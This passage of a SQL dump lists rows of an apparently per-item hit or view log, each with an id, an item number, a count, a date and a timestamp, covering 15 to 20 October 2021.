23:58:16'),(36198,1720,1,'2021-10-15','2021-10-15 01:40:15'),(36199,1718,1,'2021-10-15','2021-10-15 03:10:55'),(36200,1720,1,'2021-10-15','2021-10-15 03:41:16'),(36201,472,1,'2021-10-15','2021-10-15 04:09:26'),(36202,2503,1,'2021-10-15','2021-10-15 05:43:01'),(36203,1600,1,'2021-10-15','2021-10-15 05:55:24'),(36204,2309,1,'2021-10-15','2021-10-15 06:10:36'),(36205,2911,1,'2021-10-15','2021-10-15 06:13:11'),(36206,1602,1,'2021-10-15','2021-10-15 07:02:01'),(36207,4357,1,'2021-10-15','2021-10-15 07:05:52'),(36208,3030,1,'2021-10-15','2021-10-15 07:44:38'),(36209,3038,1,'2021-10-15','2021-10-15 07:47:16'),(36210,1604,1,'2021-10-15','2021-10-15 07:49:35'),(36211,1600,1,'2021-10-15','2021-10-15 07:59:16'),(36212,1600,1,'2021-10-15','2021-10-15 08:10:36'),(36213,3781,1,'2021-10-15','2021-10-15 08:15:21'),(36214,1604,1,'2021-10-15','2021-10-15 08:19:25'),(36215,3764,1,'2021-10-15','2021-10-15 08:48:26'),(36216,72,1,'2021-10-15','2021-10-15 08:49:23'),(36217,4238,1,'2021-10-15','2021-10-15 08:51:17'),(36218,3060,1,'2021-10-15','2021-10-15 09:25:47'),(36219,1588,1,'2021-10-15','2021-10-15 09:36:53'),(36220,1588,1,'2021-10-15','2021-10-15 09:37:10'),(36221,1592,1,'2021-10-15','2021-10-15 09:44:33'),(36222,3746,1,'2021-10-15','2021-10-15 09:59:48'),(36223,2159,1,'2021-10-15','2021-10-15 10:02:31'),(36224,2159,1,'2021-10-15','2021-10-15 10:03:09'),(36225,2159,1,'2021-10-15','2021-10-15 10:03:51'),(36226,2159,1,'2021-10-15','2021-10-15 10:04:44'),(36227,4335,1,'2021-10-15','2021-10-15 10:06:30'),(36228,2159,1,'2021-10-15','2021-10-15 10:07:30'),(36229,2159,1,'2021-10-15','2021-10-15 10:07:58'),(36230,2159,1,'2021-10-15','2021-10-15 10:14:10'),(36231,2159,1,'2021-10-15','2021-10-15 10:16:03'),(36232,2159,1,'2021-10-15','2021-10-15 10:19:17'),(36233,3030,1,'2021-10-15','2021-10-15 10:39:15'),(36234,1586,1,'2021-10-15','2021-10-15 11:04:06'),(36235,4238,1,'2021-10-15','2021-10-15 11:08:28'),(36236,4238,1,'2021-10-15','2021-10-15 11:15:16'),(36237,4238,1,'2021-10-15','2021-10-15 11:20:04'),(36238,1728,1,'2021-10-15','2021-10-15 12:00:09'),(36239,3030,1,'2021-10-15','2021-10-15 12:25:51'),(36240,4420,1,'2021-10-15','2021-10-15 12:42:39'),(36241,1718,1,'2021-10-15','2021-10-15 13:01:14'),(36242,68,1,'2021-10-15','2021-10-15 13:44:08'),(36243,89,1,'2021-10-15','2021-10-15 13:45:22'),(36244,89,1,'2021-10-15','2021-10-15 13:46:23'),(36245,89,1,'2021-10-15','2021-10-15 13:47:33'),(36246,1600,1,'2021-10-15','2021-10-15 13:47:52'),(36247,87,1,'2021-10-15','2021-10-15 13:49:25'),(36248,2503,1,'2021-10-15','2021-10-15 14:39:59'),(36249,3030,1,'2021-10-15','2021-10-15 15:22:40'),(36250,483,1,'2021-10-15','2021-10-15 15:42:04'),(36251,2159,1,'2021-10-15','2021-10-15 16:10:42'),(36252,2309,1,'2021-10-15','2021-10-15 16:16:52'),(36253,2309,1,'2021-10-15','2021-10-15 16:22:42'),(36254,2309,1,'2021-10-15','2021-10-15 16:25:44'),(36255,1722,1,'2021-10-15','2021-10-15 16:55:55'),(36256,2309,1,'2021-10-15','2021-10-15 17:30:02'),(36257,2309,1,'2021-10-15','2021-10-15 17:30:05'),(36258,2309,1,'2021-10-15','2021-10-15 17:30:07'),(36259,2159,1,'2021-10-15','2021-10-15 17:40:27'),(36260,2159,1,'2021-10-15','2021-10-15 17:41:20'),(36261,2159,1,'2021-10-15','2021-10-15 17:41:31'),(36262,3030,1,'2021-10-15','2021-10-15 17:55:07'),(36263,3030,1,'2021-10-15','2021-10-15 17:57:19'),(36264,2904,1,'2021-10-15','2021-10-15 17:58:00'),(36265,2904,1,'2021-10-15','2021-10-15 17:59:25'),(36266,2159,1,'2021-10-15','2021-10-15 17:59:41'),(36267,2904,1,'2021-10-15','2021-10-15 18:00:01'),(36268,102,1,'2021-10-15','2021-10-15 18:01:23'),(36269,2904,1,'2021-10-15','2021-10-15 18:11:54'),(36270,3030,1,'2021-10-15','2021-10-15 18:12:13'),(36271,472,1,'2021-10-15','2021-10-15 19:00:47'),(36272,3030,1,'2021-10-15','2021-10-15 19:01:43'),(36273,3030,1,'2021-10-15','2021-10-15 19:01:47'),(36274,3030,1,'2021-10-15','2021-10-15 19:02:01'),(36275,3691,1,'2021-10-15','2021-10-15 19:23:08'),(36276,3764,1,'2021-10-15','2021-10-15 19:34:21'),(36277,2419,1,'2021-10-15','2021-10-15 19:45:42'),(36278,1588,1,'2021-10-15','2021-10-15 19:56:48'),(36279,1877,1,'2021-10-15','2021-10-15 20:04:23'),(36280,2911,1,'2021-10-15','2021-10-15 20:19:24'),(36281,3746,1,'2021-10-15','2021-10-15 20:49:41'),(36282,2457,1,'2021-10-15','2021-10-15 21:05:05'),(36283,3127,1,'2021-10-15','2021-10-15 21:19:30'),(36284,80,1,'2021-10-15','2021-10-15 22:08:58'),(36285,3030,1,'2021-10-15','2021-10-15 22:13:47'),(36286,2989,1,'2021-10-15','2021-10-15 22:50:23'),(36287,3127,1,'2021-10-15','2021-10-15 23:06:39'),(36288,479,1,'2021-10-15','2021-10-15 23:20:20'),(36289,80,1,'2021-10-15','2021-10-15 23:35:17'),(36290,80,1,'2021-10-16','2021-10-16 00:11:40'),(36291,1614,1,'2021-10-16','2021-10-16 00:19:23'),(36292,1602,1,'2021-10-16','2021-10-16 00:45:55'),(36293,2457,1,'2021-10-16','2021-10-16 00:51:26'),(36294,72,1,'2021-10-16','2021-10-16 01:42:49'),(36295,1612,1,'2021-10-16','2021-10-16 01:43:40'),(36296,1600,1,'2021-10-16','2021-10-16 01:52:34'),(36297,1602,1,'2021-10-16','2021-10-16 02:07:56'),(36298,1608,1,'2021-10-16','2021-10-16 02:09:27'),(36299,1718,1,'2021-10-16','2021-10-16 03:39:19'),(36300,3498,1,'2021-10-16','2021-10-16 03:59:51'),(36301,3498,1,'2021-10-16','2021-10-16 04:00:14'),(36302,1602,1,'2021-10-16','2021-10-16 04:03:21'),(36303,472,1,'2021-10-16','2021-10-16 04:22:17'),(36304,2297,1,'2021-10-16','2021-10-16 04:37:20'),(36305,1588,1,'2021-10-16','2021-10-16 04:40:23'),(36306,2457,1,'2021-10-16','2021-10-16 05:35:03'),(36307,468,1,'2021-10-16','2021-10-16 05:45:57'),(36308,3030,1,'2021-10-16','2021-10-16 06:07:02'),(36309,3691,1,'2021-10-16','2021-10-16 06:10:14'),(36310,1608,1,'2021-10-16','2021-10-16 07:54:23'),(36311,470,1,'2021-10-16','2021-10-16 08:04:22'),(36312,1728,1,'2021-10-16','2021-10-16 08:34:22'),(36313,1614,1,'2021-10-16','2021-10-16 09:04:22'),(36314,72,1,'2021-10-16','2021-10-16 09:55:39'),(36315,1602,1,'2021-10-16','2021-10-16 10:04:22'),(36316,2159,1,'2021-10-16','2021-10-16 10:31:27'),(36317,2159,1,'2021-10-16','2021-10-16 10:31:48'),(36318,2159,1,'2021-10-16','2021-10-16 10:31:49'),(36319,2159,1,'2021-10-16','2021-10-16 10:31:55'),(36320,3781,1,'2021-10-16','2021-10-16 11:25:03'),(36321,3781,1,'2021-10-16','2021-10-16 11:25:03'),(36322,2993,1,'2021-10-16','2021-10-16 11:25:10'),(36323,1544,1,'2021-10-16','2021-10-16 11:29:40'),(36324,1582,1,'2021-10-16','2021-10-16 11:49:43'),(36325,3430,1,'2021-10-16','2021-10-16 12:05:55'),(36326,3438,1,'2021-10-16','2021-10-16 12:05:56'),(36327,3498,1,'2021-10-16','2021-10-16 12:06:01'),(36328,3482,1,'2021-10-16','2021-10-16 12:06:26'),(36329,2956,1,'2021-10-16','2021-10-16 12:06:27'),(36330,3127,1,'2021-10-16','2021-10-16 12:11:52'),(36331,3290,1,'2021-10-16','2021-10-16 12:34:21'),(36332,2309,1,'2021-10-16','2021-10-16 13:07:28'),(36333,2309,1,'2021-10-16','2021-10-16 13:07:28'),(36334,2309,1,'2021-10-16','2021-10-16 13:09:15'),(36335,2309,1,'2021-10-16','2021-10-16 13:09:42'),(36336,2309,1,'2021-10-16','2021-10-16 13:11:32'),(36337,2309,1,'2021-10-16','2021-10-16 13:17:19'),(36338,2309,1,'2021-10-16','2021-10-16 13:19:22'),(36339,2159,1,'2021-10-16','2021-10-16 13:20:01'),(36340,2159,1,'2021-10-16','2021-10-16 13:20:02'),(36341,2159,1,'2021-10-16','2021-10-16 13:20:06'),(36342,1718,1,'2021-10-16','2021-10-16 13:25:54'),(36343,1602,1,'2021-10-16','2021-10-16 13:44:43'),(36344,1588,1,'2021-10-16','2021-10-16 13:45:36'),(36345,2904,1,'2021-10-16','2021-10-16 13:46:45'),(36346,3030,1,'2021-10-16','2021-10-16 13:56:18'),(36347,3030,1,'2021-10-16','2021-10-16 14:37:07'),(36348,2159,1,'2021-10-16','2021-10-16 15:09:54'),(36349,2159,1,'2021-10-16','2021-10-16 15:09:59'),(36350,4400,1,'2021-10-16','2021-10-16 15:22:51'),(36351,4400,1,'2021-10-16','2021-10-16 15:30:33'),(36352,2503,1,'2021-10-16','2021-10-16 15:32:20'),(36353,2813,1,'2021-10-16','2021-10-16 16:09:31'),(36354,3030,1,'2021-10-16','2021-10-16 16:14:44'),(36355,80,1,'2021-10-16','2021-10-16 16:18:09'),(36356,2309,1,'2021-10-16','2021-10-16 16:35:02'),(36357,2309,1,'2021-10-16','2021-10-16 16:35:02'),(36358,2309,1,'2021-10-16','2021-10-16 16:35:09'),(36359,2309,1,'2021-10-16','2021-10-16 16:56:02'),(36360,2309,1,'2021-10-16','2021-10-16 19:11:58'),(36361,2309,1,'2021-10-16','2021-10-16 19:12:02'),(36362,2309,1,'2021-10-16','2021-10-16 19:12:09'),(36363,1602,1,'2021-10-16','2021-10-16 19:14:09'),(36364,2309,1,'2021-10-16','2021-10-16 19:20:24'),(36365,2309,1,'2021-10-16','2021-10-16 19:22:47'),(36366,2309,1,'2021-10-16','2021-10-16 19:24:35'),(36367,1608,1,'2021-10-16','2021-10-16 19:47:54'),(36368,1728,1,'2021-10-16','2021-10-16 19:59:06'),(36369,108,1,'2021-10-16','2021-10-16 20:06:10'),(36370,1612,1,'2021-10-16','2021-10-16 20:22:05'),(36371,1612,1,'2021-10-16','2021-10-16 20:25:46'),(36372,2159,1,'2021-10-16','2021-10-16 20:42:32'),(36373,2159,1,'2021-10-16','2021-10-16 20:42:56'),(36374,2159,1,'2021-10-16','2021-10-16 20:43:21'),(36375,2159,1,'2021-10-16','2021-10-16 20:47:01'),(36376,3030,1,'2021-10-16','2021-10-16 21:21:00'),(36377,3030,1,'2021-10-16','2021-10-16 21:25:07'),(36378,3030,1,'2021-10-16','2021-10-16 21:25:47'),(36379,1602,1,'2021-10-16','2021-10-16 21:44:59'),(36380,3781,1,'2021-10-16','2021-10-16 21:56:09'),(36381,3781,1,'2021-10-16','2021-10-16 21:57:14'),(36382,3781,1,'2021-10-16','2021-10-16 22:01:02'),(36383,2309,1,'2021-10-16','2021-10-16 23:23:54'),(36384,2159,1,'2021-10-16','2021-10-16 23:46:49'),(36385,2159,1,'2021-10-16','2021-10-16 23:47:51'),(36386,2159,1,'2021-10-16','2021-10-16 23:48:26'),(36387,1709,1,'2021-10-17','2021-10-17 00:36:59'),(36388,3285,1,'2021-10-17','2021-10-17 00:52:33'),(36389,4301,1,'2021-10-17','2021-10-17 01:02:19'),(36390,1588,1,'2021-10-17','2021-10-17 01:27:24'),(36391,2956,1,'2021-10-17','2021-10-17 01:27:32'),(36392,72,1,'2021-10-17','2021-10-17 02:08:01'),(36393,1718,1,'2021-10-17','2021-10-17 03:28:20'),(36394,2159,1,'2021-10-17','2021-10-17 04:01:42'),(36395,3664,1,'2021-10-17','2021-10-17 05:04:12'),(36396,2609,1,'2021-10-17','2021-10-17 05:19:14'),(36397,3247,1,'2021-10-17','2021-10-17 05:25:47'),(36398,3247,1,'2021-10-17','2021-10-17 05:40:46'),(36399,1606,1,'2021-10-17','2021-10-17 06:08:27'),(36400,1544,1,'2021-10-17','2021-10-17 06:38:48'),(36401,2309,1,'2021-10-17','2021-10-17 06:56:19'),(36402,3124,1,'2021-10-17','2021-10-17 08:25:46'),(36403,2309,1,'2021-10-17','2021-10-17 08:58:00'),(36404,72,1,'2021-10-17','2021-10-17 09:29:18'),(36405,3781,1,'2021-10-17','2021-10-17 10:13:54'),(36406,1612,1,'2021-10-17','2021-10-17 10:38:54'),(36407,1612,1,'2021-10-17','2021-10-17 10:38:59'),(36408,2309,1,'2021-10-17','2021-10-17 11:00:55'),(36409,2309,1,'2021-10-17','2021-10-17 11:00:56'),(36410,1588,1,'2021-10-17','2021-10-17 11:12:53'),(36411,2309,1,'2021-10-17','2021-10-17 11:16:53'),(36412,2309,1,'2021-10-17','2021-10-17 11:18:05'),(36413,2309,1,'2021-10-17','2021-10-17 11:24:15'),(36414,2309,1,'2021-10-17','2021-10-17 11:25:31'),(36415,2309,1,'2021-10-17','2021-10-17 11:25:33'),(36416,2775,1,'2021-10-17','2021-10-17 12:01:12'),(36417,3290,1,'2021-10-17','2021-10-17 12:38:47'),(36418,2813,1,'2021-10-17','2021-10-17 13:01:16'),(36419,1602,1,'2021-10-17','2021-10-17 13:32:37'),(36420,1602,1,'2021-10-17','2021-10-17 14:36:52'),(36421,80,1,'2021-10-17','2021-10-17 14:49:23'),(36422,1602,1,'2021-10-17','2021-10-17 14:52:09'),(36423,1602,1,'2021-10-17','2021-10-17 14:56:22'),(36424,80,1,'2021-10-17','2021-10-17 14:56:38'),(36425,80,1,'2021-10-17','2021-10-17 14:59:07'),(36426,1602,1,'2021-10-17','2021-10-17 14:59:22'),(36427,76,1,'2021-10-17','2021-10-17 15:02:17'),(36428,76,1,'2021-10-17','2021-10-17 15:03:16'),(36429,1602,1,'2021-10-17','2021-10-17 15:03:27'),(36430,2309,1,'2021-10-17','2021-10-17 15:33:18'),(36431,2309,1,'2021-10-17','2021-10-17 15:33:18'),(36432,2309,1,'2021-10-17','2021-10-17 15:56:54'),(36433,2309,1,'2021-10-17','2021-10-17 15:56:58'),(36434,2309,1,'2021-10-17','2021-10-17 16:08:53'),(36435,1778,1,'2021-10-17','2021-10-17 16:43:02'),(36436,1778,1,'2021-10-17','2021-10-17 16:43:22'),(36437,1778,1,'2021-10-17','2021-10-17 16:43:31'),(36438,1778,1,'2021-10-17','2021-10-17 16:43:49'),(36439,1778,1,'2021-10-17','2021-10-17 16:44:04'),(36440,1778,1,'2021-10-17','2021-10-17 16:44:28'),(36441,1778,1,'2021-10-17','2021-10-17 16:44:51'),(36442,1778,1,'2021-10-17','2021-10-17 16:45:18'),(36443,1778,1,'2021-10-17','2021-10-17 16:46:23'),(36444,72,1,'2021-10-17','2021-10-17 17:04:34'),(36445,2813,1,'2021-10-17','2021-10-17 17:07:40'),(36446,3781,1,'2021-10-17','2021-10-17 17:10:13'),(36447,1718,1,'2021-10-17','2021-10-17 17:11:35'),(36448,2309,1,'2021-10-17','2021-10-17 17:18:59'),(36449,1586,1,'2021-10-17','2021-10-17 17:31:15'),(36450,1586,1,'2021-10-17','2021-10-17 17:42:12'),(36451,3710,1,'2021-10-17','2021-10-17 17:53:07'),(36452,3714,1,'2021-10-17','2021-10-17 18:04:20'),(36453,3124,1,'2021-10-17','2021-10-17 18:15:34'),(36454,1598,1,'2021-10-17','2021-10-17 18:38:30'),(36455,3285,1,'2021-10-17','2021-10-17 19:00:21'),(36456,3030,1,'2021-10-17','2021-10-17 19:01:48'),(36457,3781,1,'2021-10-17','2021-10-17 19:46:14'),(36458,87,1,'2021-10-17','2021-10-17 19:50:50'),(36459,3030,1,'2021-10-17','2021-10-17 19:53:28'),(36460,3030,1,'2021-10-17','2021-10-17 19:54:30'),(36461,2159,1,'2021-10-17','2021-10-17 19:57:44'),(36462,3030,1,'2021-10-17','2021-10-17 20:38:34'),(36463,3714,1,'2021-10-17','2021-10-17 20:44:51'),(36464,2159,1,'2021-10-17','2021-10-17 20:47:22'),(36465,2159,1,'2021-10-17','2021-10-17 20:47:26'),(36466,2309,1,'2021-10-17','2021-10-17 20:52:10'),(36467,2309,1,'2021-10-17','2021-10-17 21:11:04'),(36468,2309,1,'2021-10-17','2021-10-17 21:11:06'),(36469,488,1,'2021-10-17','2021-10-17 21:38:11'),(36470,487,1,'2021-10-17','2021-10-17 21:38:17'),(36471,486,1,'2021-10-17','2021-10-17 21:38:25'),(36472,87,1,'2021-10-17','2021-10-17 21:38:38'),(36473,471,1,'2021-10-17','2021-10-17 21:38:56'),(36474,108,1,'2021-10-17','2021-10-17 21:39:12'),(36475,91,1,'2021-10-17','2021-10-17 21:39:58'),(36476,2658,1,'2021-10-17','2021-10-17 21:41:03'),(36477,1594,1,'2021-10-17','2021-10-17 21:47:47'),(36478,1594,1,'2021-10-17','2021-10-17 21:47:50'),(36479,3030,1,'2021-10-17','2021-10-17 22:45:29'),(36480,3290,1,'2021-10-17','2021-10-17 23:08:53'),(36481,2159,1,'2021-10-17','2021-10-17 23:15:34'),(36482,68,1,'2021-10-17','2021-10-17 23:31:23'),(36483,2159,1,'2021-10-18','2021-10-18 00:03:03'),(36484,2159,1,'2021-10-18','2021-10-18 00:03:04'),(36485,87,1,'2021-10-18','2021-10-18 00:03:35'),(36486,87,1,'2021-10-18','2021-10-18 00:03:36'),(36487,91,1,'2021-10-18','2021-10-18 00:03:37'),(36488,91,1,'2021-10-18','2021-10-18 00:03:37'),(36489,87,1,'2021-10-18','2021-10-18 00:03:43'),(36490,2159,1,'2021-10-18','2021-10-18 00:10:30'),(36491,108,1,'2021-10-18','2021-10-18 00:39:54'),(36492,1606,1,'2021-10-18','2021-10-18 01:23:46'),(36493,2309,1,'2021-10-18','2021-10-18 01:24:49'),(36494,2309,1,'2021-10-18','2021-10-18 01:24:50'),(36495,2309,1,'2021-10-18','2021-10-18 01:24:51'),(36496,72,1,'2021-10-18','2021-10-18 01:31:56'),(36497,1606,1,'2021-10-18','2021-10-18 02:04:16'),(36498,1602,1,'2021-10-18','2021-10-18 02:30:11'),(36499,2309,1,'2021-10-18','2021-10-18 04:00:08'),(36500,2813,1,'2021-10-18','2021-10-18 05:19:45'),(36501,1544,1,'2021-10-18','2021-10-18 05:35:54'),(36502,3710,1,'2021-10-18','2021-10-18 05:49:47'),(36503,68,1,'2021-10-18','2021-10-18 07:30:32'),(36504,72,1,'2021-10-18','2021-10-18 08:43:38'),(36505,68,1,'2021-10-18','2021-10-18 09:00:21'),(36506,1544,1,'2021-10-18','2021-10-18 09:01:44'),(36507,2503,1,'2021-10-18','2021-10-18 09:05:56'),(36508,1602,1,'2021-10-18','2021-10-18 09:13:58'),(36509,1544,1,'2021-10-18','2021-10-18 10:01:21'),(36510,3781,1,'2021-10-18','2021-10-18 10:03:29'),(36511,3781,1,'2021-10-18','2021-10-18 10:30:31'),(36512,1594,1,'2021-10-18','2021-10-18 10:59:51'),(36513,89,1,'2021-10-18','2021-10-18 11:02:40'),(36514,89,1,'2021-10-18','2021-10-18 11:03:44'),(36515,1610,1,'2021-10-18','2021-10-18 11:27:33'),(36516,1610,1,'2021-10-18','2021-10-18 11:33:00'),(36517,4454,1,'2021-10-18','2021-10-18 11:40:23'),(36518,89,1,'2021-10-18','2021-10-18 11:55:08'),(36519,89,1,'2021-10-18','2021-10-18 11:56:34'),(36520,4457,1,'2021-10-18','2021-10-18 11:57:01'),(36521,89,1,'2021-10-18','2021-10-18 11:57:46'),(36522,89,1,'2021-10-18','2021-10-18 11:58:04'),(36523,1582,1,'2021-10-18','2021-10-18 11:58:18'),(36524,2309,1,'2021-10-18','2021-10-18 11:59:55'),(36525,1594,1,'2021-10-18','2021-10-18 12:00:50'),(36526,1594,1,'2021-10-18','2021-10-18 12:00:50'),(36527,1602,1,'2021-10-18','2021-10-18 12:03:21'),(36528,89,1,'2021-10-18','2021-10-18 12:06:40'),(36529,89,1,'2021-10-18','2021-10-18 12:07:13'),(36530,4457,1,'2021-10-18','2021-10-18 12:09:10'),(36531,1602,1,'2021-10-18','2021-10-18 12:12:32'),(36532,468,1,'2021-10-18','2021-10-18 12:13:52'),(36533,1606,1,'2021-10-18','2021-10-18 12:22:49'),(36534,1588,1,'2021-10-18','2021-10-18 12:28:07'),(36535,3251,1,'2021-10-18','2021-10-18 12:33:36'),(36536,1608,1,'2021-10-18','2021-10-18 12:41:42'),(36537,2558,1,'2021-10-18','2021-10-18 12:42:38'),(36538,91,1,'2021-10-18','2021-10-18 12:44:24'),(36539,1718,1,'2021-10-18','2021-10-18 12:48:10'),(36540,91,1,'2021-10-18','2021-10-18 12:48:14'),(36541,4444,1,'2021-10-18','2021-10-18 12:48:33'),(36542,4444,1,'2021-10-18','2021-10-18 12:48:35'),(36543,4416,1,'2021-10-18','2021-10-18 12:50:44'),(36544,1600,1,'2021-10-18','2021-10-18 12:58:25'),(36545,2503,1,'2021-10-18','2021-10-18 13:05:02'),(36546,469,1,'2021-10-18','2021-10-18 13:47:43'),(36547,2558,1,'2021-10-18','2021-10-18 14:01:08'),(36548,80,1,'2021-10-18','2021-10-18 14:32:22'),(36549,3290,1,'2021-10-18','2021-10-18 14:58:16'),(36550,1598,1,'2021-10-18','2021-10-18 15:00:50'),(36551,68,1,'2021-10-18','2021-10-18 15:09:38'),(36552,76,1,'2021-10-18','2021-10-18 15:10:13'),(36553,84,1,'2021-10-18','2021-10-18 15:10:48'),(36554,68,1,'2021-10-18','2021-10-18 15:11:38'),(36555,1602,1,'2021-10-18','2021-10-18 15:31:43'),(36556,2410,1,'2021-10-18','2021-10-18 16:00:36'),(36557,2804,1,'2021-10-18','2021-10-18 16:07:53'),(36558,3030,1,'2021-10-18','2021-10-18 16:07:55'),(36559,72,1,'2021-10-18','2021-10-18 16:41:41'),(36560,3041,1,'2021-10-18','2021-10-18 16:49:54'),(36561,1586,1,'2021-10-18','2021-10-18 17:07:37'),(36562,3259,1,'2021-10-18','2021-10-18 17:18:54'),(36563,1600,1,'2021-10-18','2021-10-18 17:53:41'),(36564,479,1,'2021-10-18','2021-10-18 17:55:00'),(36565,3710,1,'2021-10-18','2021-10-18 17:56:20'),(36566,2769,1,'2021-10-18','2021-10-18 18:18:48'),(36567,3259,1,'2021-10-18','2021-10-18 18:41:19'),(36568,3259,1,'2021-10-18','2021-10-18 18:42:31'),(36569,2813,1,'2021-10-18','2021-10-18 19:03:45'),(36570,1612,1,'2021-10-18','2021-10-18 19:04:26'),(36571,80,1,'2021-10-18','2021-10-18 19:04:35'),(36572,1612,1,'2021-10-18','2021-10-18 19:06:59'),(36573,478,1,'2021-10-18','2021-10-18 19:13:28'),(36574,1608,1,'2021-10-18','2021-10-18 19:21:44'),(36575,1582,1,'2021-10-18','2021-10-18 19:32:08'),(36576,1582,1,'2021-10-18','2021-10-18 19:50:56'),(36577,1600,1,'2021-10-18','2021-10-18 19:59:10'),(36578,3030,1,'2021-10-18','2021-10-18 20:11:42'),(36579,1582,1,'2021-10-18','2021-10-18 20:24:14'),(36580,1695,1,'2021-10-18','2021-10-18 20:42:04'),(36581,3789,1,'2021-10-18','2021-10-18 20:42:30'),(36582,72,1,'2021-10-18','2021-10-18 20:51:13'),(36583,87,1,'2021-10-18','2021-10-18 21:47:37'),(36584,91,1,'2021-10-18','2021-10-18 21:48:51'),(36585,2152,1,'2021-10-18','2021-10-18 21:58:40'),(36586,2152,1,'2021-10-18','2021-10-18 21:59:13'),(36587,2152,1,'2021-10-18','2021-10-18 21:59:37'),(36588,2152,1,'2021-10-18','2021-10-18 22:00:06'),(36589,76,1,'2021-10-18','2021-10-18 22:00:49'),(36590,3030,1,'2021-10-18','2021-10-18 22:52:22'),(36591,80,1,'2021-10-18','2021-10-18 23:33:27'),(36592,2309,1,'2021-10-18','2021-10-18 23:33:44'),(36593,2309,1,'2021-10-18','2021-10-18 23:41:21'),(36594,1718,1,'2021-10-18','2021-10-18 23:59:19'),(36595,1588,1,'2021-10-19','2021-10-19 01:14:51'),(36596,1594,1,'2021-10-19','2021-10-19 02:34:59'),(36597,1718,1,'2021-10-19','2021-10-19 02:55:28'),(36598,1612,1,'2021-10-19','2021-10-19 03:47:54'),(36599,1774,1,'2021-10-19','2021-10-19 04:02:21'),(36600,1774,1,'2021-10-19','2021-10-19 04:02:39'),(36601,1774,1,'2021-10-19','2021-10-19 04:03:02'),(36602,1774,1,'2021-10-19','2021-10-19 04:06:21'),(36603,1774,1,'2021-10-19','2021-10-19 04:06:32'),(36604,1774,1,'2021-10-19','2021-10-19 04:06:52'),(36605,1774,1,'2021-10-19','2021-10-19 04:06:58'),(36606,3257,1,'2021-10-19','2021-10-19 04:14:21'),(36607,72,1,'2021-10-19','2021-10-19 05:10:45'),(36608,1600,1,'2021-10-19','2021-10-19 05:43:25'),(36609,3109,1,'2021-10-19','2021-10-19 06:11:06'),(36610,2309,1,'2021-10-19','2021-10-19 06:11:50'),(36611,1586,1,'2021-10-19','2021-10-19 07:16:27'),(36612,2813,1,'2021-10-19','2021-10-19 07:45:46'),(36613,2410,1,'2021-10-19','2021-10-19 07:54:28'),(36614,1592,1,'2021-10-19','2021-10-19 08:16:58'),(36615,4448,1,'2021-10-19','2021-10-19 08:23:05'),(36616,1612,1,'2021-10-19','2021-10-19 08:34:47'),(36617,4412,1,'2021-10-19','2021-10-19 08:37:49'),(36618,3257,1,'2021-10-19','2021-10-19 09:03:47'),(36619,4391,1,'2021-10-19','2021-10-19 09:57:38'),(36620,1588,1,'2021-10-19','2021-10-19 10:37:20'),(36621,1602,1,'2021-10-19','2021-10-19 10:51:50'),(36622,2503,1,'2021-10-19','2021-10-19 11:03:05'),(36623,1602,1,'2021-10-19','2021-10-19 11:53:36'),(36624,4412,1,'2021-10-19','2021-10-19 12:08:45'),(36625,68,1,'2021-10-19','2021-10-19 12:12:04'),(36626,72,1,'2021-10-19','2021-10-19 12:16:24'),(36627,4457,1,'2021-10-19','2021-10-19 12:17:24'),(36628,1722,1,'2021-10-19','2021-10-19 12:28:42'),(36629,1722,1,'2021-10-19','2021-10-19 12:29:20'),(36630,1722,1,'2021-10-19','2021-10-19 12:29:37'),(36631,1722,1,'2021-10-19','2021-10-19 12:29:54'),(36632,1544,1,'2021-10-19','2021-10-19 12:30:16'),(36633,3710,1,'2021-10-19','2021-10-19 12:30:50'),(36634,1722,1,'2021-10-19','2021-10-19 12:31:01'),(36635,1722,1,'2021-10-19','2021-10-19 12:35:13'),(36636,1722,1,'2021-10-19','2021-10-19 12:35:39'),(36637,3030,1,'2021-10-19','2021-10-19 12:45:41'),(36638,3030,1,'2021-10-19','2021-10-19 13:06:11'),(36639,4323,1,'2021-10-19','2021-10-19 13:35:00'),(36640,472,1,'2021-10-19','2021-10-19 14:03:42'),(36641,2063,1,'2021-10-19','2021-10-19 14:10:39'),(36642,76,1,'2021-10-19','2021-10-19 14:28:18'),(36643,2309,1,'2021-10-19','2021-10-19 15:04:37'),(36644,2309,1,'2021-10-19','2021-10-19 15:04:41'),(36645,1602,1,'2021-10-19','2021-10-19 15:49:29'),(36646,1602,1,'2021-10-19','2021-10-19 15:52:26'),(36647,2503,1,'2021-10-19','2021-10-19 16:20:33'),(36648,3030,1,'2021-10-19','2021-10-19 16:28:17'),(36649,3278,1,'2021-10-19','2021-10-19 16:50:59'),(36650,3005,1,'2021-10-19','2021-10-19 17:03:51'),(36651,1586,1,'2021-10-19','2021-10-19 17:39:48'),(36652,1730,1,'2021-10-19','2021-10-19 17:43:45'),(36653,2804,1,'2021-10-19','2021-10-19 18:03:32'),(36654,1606,1,'2021-10-19','2021-10-19 18:20:57'),(36655,2804,1,'2021-10-19','2021-10-19 18:23:53'),(36656,3710,1,'2021-10-19','2021-10-19 18:39:29'),(36657,3285,1,'2021-10-19','2021-10-19 19:53:02'),(36658,2813,1,'2021-10-19','2021-10-19 20:21:02'),(36659,3430,1,'2021-10-19','2021-10-19 20:40:34'),(36660,72,1,'2021-10-19','2021-10-19 20:58:52'),(36661,487,1,'2021-10-19','2021-10-19 20:59:17'),(36662,3243,1,'2021-10-19','2021-10-19 21:01:04'),(36663,3030,1,'2021-10-19','2021-10-19 21:31:29'),(36664,3290,1,'2021-10-19','2021-10-19 21:32:17'),(36665,3290,1,'2021-10-19','2021-10-19 21:32:30'),(36666,3030,1,'2021-10-19','2021-10-19 21:39:45'),(36667,89,1,'2021-10-19','2021-10-19 21:53:26'),(36668,1544,1,'2021-10-19','2021-10-19 21:53:38'),(36669,3030,1,'2021-10-19','2021-10-19 21:56:40'),(36670,2904,1,'2021-10-19','2021-10-19 21:57:46'),(36671,2904,1,'2021-10-19','2021-10-19 21:59:11'),(36672,74,1,'2021-10-19','2021-10-19 21:59:53'),(36673,2904,1,'2021-10-19','2021-10-19 22:00:55'),(36674,2904,1,'2021-10-19','2021-10-19 22:01:14'),(36675,4238,1,'2021-10-19','2021-10-19 22:31:22'),(36676,1606,1,'2021-10-19','2021-10-19 22:51:37'),(36677,479,1,'2021-10-19','2021-10-19 22:59:33'),(36678,1602,1,'2021-10-19','2021-10-19 23:05:00'),(36679,2309,1,'2021-10-20','2021-10-20 01:03:13'),(36680,479,1,'2021-10-20','2021-10-20 03:11:20'),(36681,1594,1,'2021-10-20','2021-10-20 03:19:05'),(36682,1544,1,'2021-10-20','2021-10-20 04:03:45'),(36683,1770,1,'2021-10-20','2021-10-20 